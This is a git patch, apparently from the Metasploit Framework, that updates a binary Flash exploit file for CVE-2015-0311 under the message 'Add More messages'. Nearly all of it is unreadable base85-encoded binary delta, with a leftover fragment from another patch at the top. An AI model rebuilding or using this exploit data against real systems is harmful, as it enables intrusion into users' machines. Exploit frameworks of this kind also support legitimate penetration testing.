z4dj;5o}4xu-iyH?z)}84@b2gjseP=51^_D=#xH8L)s05z5_s4>eFW5;JU9scC?#H_
zsFd@q6tY4D4#B@0W-}H)p5oB5bY4)7HuAZ%ZQ95sOn>L=wIkKP`ElV1L9$IB=Uz!V
zjmvM2_n_=>d8S$KwN6VyuTXA3?kH4KGL1D>QgsBf=UQ7<kwCe1=A?@*Ia-${A?Mcs
zOw8PsZ445MosiM1S!Og)6zaX<h6~fM!7x{}cJ&^Cn_V+ay_wyzH_b&biGOz9w5{{`
z1~AqPet$}%si^dLVYnCyeY|UE9$^20@R3%TmsPwV2>~JnMM2dsifPP&V-JJk{`yXX
zmouw30j#*b>dCCjN6MN1bNsteMPlXH3P82Fo|Sy$b*naRL9V(K#eJ3<f$g&bJJr3W
zo!8FFPS`+;ehK5{>fS61Mxq=VckTp0^gOR^)G!v&5sKImSYJRd+uN;qOu-8;N4CuC
donTi|j}Jl+NrRpMHm*3FHdAKzfB*Js5HN8zW}E;3


From 29ccc8367bb8fdd178e7b4001ae20a4f803b8a37 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 14:47:47 -0500
Subject: [PATCH 0194/1013] Add More messages

---
 data/exploits/CVE-2015-0311/msf.swf | Bin 20512 -> 20531 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf
index 90b0f1dea49817641b5d9f4b4245332b8c130a71..860efe1292298d18f43163f4d77d920d589fbe13 100644
GIT binary patch
delta 20409
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
